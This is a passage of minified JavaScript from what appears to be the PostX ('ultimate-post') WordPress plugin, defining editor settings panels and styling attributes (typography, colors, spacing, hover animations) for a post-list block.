Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiMargin","pagiPadding"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,incSettings:[{position:1,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"loadMore",label:__("Load More","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")},{value:"pagination",label:__("Pagination","ultimate-post")}]}}],exSettings:["paginationType"],exStyle:["pagiTypo","pagiMargin","pagiPadding"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:a.JA,exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:a.JA}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo",{data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor","titleBackground",{position:3,data:{type:"color",key:"lgTitleColor",label:__("Large Title Color","ultimate-post")}},{position:4,data:{type:"color",key:"lgTitleHoverColor",label:__("Large Title Hover Color","ultimate-post")}}],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleTypo","titleColor","titleHoverColor","titleBackground"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post"),include:[{position:1,data:{type:"toggle",key:"showFullExcerptLg",label:__("Show Full Excerpt (Large Post)","ultimate-post")}},{position:2,data:{type:"range",key:"excerptLimitLg",label:__("Large Post Excerpt Limit","ultimate-post"),min:0,max:500,step:1,help:__("Excerpt Limit from Post Content.","ultimate-post")}},{position:4,data:{type:"toggle",key:"showSmallExcerpt",label:__("Show Small Excerpt","ultimate-post")}}]}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,incSettings:[{position:0,data:{type:"toggle",key:"showSmallMeta",label:__("Small Item Meta","ultimate-post")}},{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF}],incStyle:[{position:4,data:{type:"color",key:"lgMetaHoverColor",label:__("Large Meta Hover Color","ultimate-post")}}],exSettings:["metaSeparator","metaStyle","metaList","metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exSettings:["catPosition"],exStyle:["catTypo","catSacing","catPadding"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,exStyle:["imgMargin"],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],incStyle:[{position:0,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}}]}));default:return null}}},44371:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},largeHeight:{type:"object",default:{lg:"100",unit:"%"},style:[{selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-image img { width: 100%; object-fit: cover; height: {{largeHeight}}; }"}]},spaceLargeItem:{type:"object",default:{lg:"60",xs:"40",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-item:first-child { margin-bottom: {{spaceLargeItem}};}"}]},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},showImage:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!0},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a { background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},titleTag:{type:"string",default:"h3"},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-all-postlist-2 .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleLgTypo:{type:"object",default:{openTypography:1,size:{lg:"28",unit:"px"},spacing:{lg:"",unit:"px"},height:{lg:"36",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-title, \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-title a"}]},lgTitleColor:{type:"string",default:"#fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-first-postlist-2 .ultp-block-content .ultp-block-title a { color:{{lgTitleColor}} !important; }"}]},lgTitleHoverColor:{type:"string",default:"#fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-first-postlist-2 .ultp-block-content .ultp-block-title a:hover { color:{{lgTitleHoverColor}} !important; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"28",unit:"px"},transform:"",decoration:"none",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-title, \n          {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:0,bottom:15,unit:"px"},xs:{top:0,bottom:10,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},titleBackground:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-title a { padding: 2px 7px; -webkit-box-decoration-break: clone; box-decoration-break: clone; background-color:{{titleBackground}}; }"}]},varticalAlign:{type:"string",default:"middle",style:[{depends:[{key:"varticalAlign",condition:"==",value:"top"}],selector:"{{ULTP}} .ultp-block-content-top .ultp-block-content { -ms-flex-item-align: flex-start;-ms-grid-row-align: flex-start;align-self: flex-start; }"},{depends:[{key:"varticalAlign",condition:"==",value:"middle"}],selector:"{{ULTP}} .ultp-block-content-middle .ultp-block-content { -ms-flex-item-align: center;-ms-grid-row-align: center;align-self: center; }"},{depends:[{key:"varticalAlign",condition:"==",value:"bottom"}],selector:"{{ULTP}} .ultp-block-content-bottom .ultp-block-content { -ms-flex-item-align: flex-end;-ms-grid-row-align: flex-end;align-self: flex-end; }"}]},imgFlip:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} .ultp-block-content-true .ultp-block-media, \n          {{ULTP}} .ultp-block-content-1 .ultp-block-media { flex-direction: row-reverse; }"}]},imgCrop:{type:"string",default:"full",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square",depends:[{key:"showImage",condition:"==",value:!0}]},imgWidth:{type:"object",default:{lg:"150",ulg:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { height:fit-content; }  \n          {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image { max-width: {{imgWidth}}; }"}]},imgHeight:{type:"object",default:{lg:"",ulg:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { height:fit-content; }  \n          {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image img { height: {{imgHeight}}; }"}]},imageScale:{type:"string",default:"cover",style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image img {object-fit: {{imageScale}};}"}]},imgAnimation:{type:"string",default:"opacity"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap { overflow:visible }  \n          {{ULTP}} .ultp-block-image"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-content-wrap { overflow:visible}  \n          {{ULTP}} .ultp-block-item:hover .ultp-block-image"}]},imgSpacing:{type:"object",default:{lg:"25"},style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"imgFlip",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image { margin-right: {{imgSpacing}}px; }  \n          .rtl {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image { margin-right: 0; margin-left: {{imgSpacing}}px; }"},{depends:[{key:"showImage",condition:"==",value:!0},{key:"imgFlip",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image { margin-left: {{imgSpacing}}px; }  \n          .rtl {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image { margin-left: 0; margin-right: {{imgSpacing}}px; }"}]},imgOverlay:{type:"boolean",default:!1},imgOverlayType:{type:"string",default:"default",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-items-wrap  .ultp-block-item:first-child .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSmallMeta:{type:"boolean",default:!0},metaListSmall:{type:"string",default:'["metaAuthor","metaDate","metaRead"]'},metaHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-all-postlist-2 span.ultp-block-meta-element:hover , \n          {{ULTP}} .ultp-block-items-wrap .ultp-all-postlist-2 span.ultp-block-meta-element:hover a { color: {{metaHoverColor}}; } \n          {{ULTP}} .ultp-all-postlist-2 span.ultp-block-meta-element:hover svg { color: {{metaHoverColor}}; }"}]},lgMetaHoverColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-first-postlist-2 span.ultp-block-meta-element:hover,  \n          {{ULTP}} .ultp-block-items-wrap .ultp-first-postlist-2 span.ultp-block-meta-element:hover a { color: {{lgMetaHoverColor}}; } \n          {{ULTP}} .ultp-first-postlist-2 span.ultp-block-meta-element:hover svg { color: {{lgMetaHoverColor}}; }"}]},showSmallCat:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},showFullExcerptLg:{type:"boolean",default:!1},excerptLimitLg:{type:"string",default:40,style:[{depends:[{key:"showFullExcerptLg",condition:"==",value:!1}]}]},showSmallExcerpt:{type:"boolean",default:!0},excerptLimit:{type:"string",default:30,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1},{key:"showSmallExcerpt",condition:"==",value:!0}]}]},excerptColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n        {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:21,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n          {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:15,bottom:0,unit:"px"},xs:{top:5}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt { padding: {{excerptPadding}}; }"}]},showSmallBtn:{type:"boolean",default:!1},separatorShow:{type:"boolean",default:!0},septColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) { border-bottom-color:{{septColor}}; }"}]},septStyle:{type:"string",default:"dashed",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) { border-bottom-style:{{septStyle}}; }"}]},septSize:{type:"string",default:{lg:"1"},style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) { border-bottom-width: {{septSize}}px; }"}]},septSpace:{type:"object",default:{lg:"30"},style:[{selector:"{{ULTP}} .ultp-block-item:not(:first-child) { padding-bottom: {{septSpace}}px; }  \n          {{ULTP}} .ultp-block-item:not(:first-child) { margin-bottom: {{septSpace}}px; }"}]},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-start; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: center; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-end; } \n          .rtl {{ULTP}} .ultp-block-meta { justify-content: start; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:" .rtl {{ULTP}} .ultp-block-readmore a { display:flex; flex-direction:row-reverse; justify-content: flex-end; align-items:center; }"}]},overlayImgBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item:first-child .ultp-block-content { background-color:{{overlayImgBg}}; }"}]},contentWrapBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item:not(:first-child) .ultp-block-content-wrap, \n        {{ULTP}} .ultp-first-postlist-2 { background:{{contentWrapBg}}; }"}]},contentWrapHoverBg:{type:"string",style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { background:{{contentWrapHoverBg}}; }"}]},contentWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},contentWrapRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { border-radius: {{contentWrapRadius}}; }"}]},contentWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { border-radius: {{contentWrapHoverRadius}}; }"}]},contentWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},lgContentPadding:{type:"object",default:{lg:{top:"24",bottom:"24",left:"24",right:"24",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-first-postlist-2  .ultp-block-content { padding: {{lgContentPadding}}; }"}]},contentWrapInnerPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content { padding: {{contentWrapInnerPadding}}; }"}]},contentWrapPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { padding: {{contentWrapPadding}}; } \n          {{ULTP}} .ultp-first-postlist-2 .ultp-block-content { margin: {{contentWrapPadding}}; }"}]},mobileImageTop:{type:"boolean",default:!1,style:[{selector:"@media (max-width: 768px) {  \n            {{ULTP}} .ultp-block-media .ultp-block-content-wrap { display: block;}\n          }"}]},headingText:{type:"string",default:"Post List #4"},counterTypo:{type:"object",default:{openTypography:1,size:{lg:18,unit:"px"},height:{lg:"30",unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""},style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:not(:first-child) .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before"}]},counterColor:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:not(:first-child) .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before { color:{{counterColor}}; }"}]},counterBgColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Contrast_2_color)"},style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:not(:first-child) .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before"}]},counterWidth:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:not(:first-child) .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before { width:{{counterWidth}}px; }"}]},counterHeight:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:not(:first-child) .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before { height:{{counterHeight}}px; }"}]},counterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Base_3_color)",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:not(:first-child) .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before"}]},counterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:not(:first-child) .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before { border-radius:{{counterRadius}}; }"}]},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: 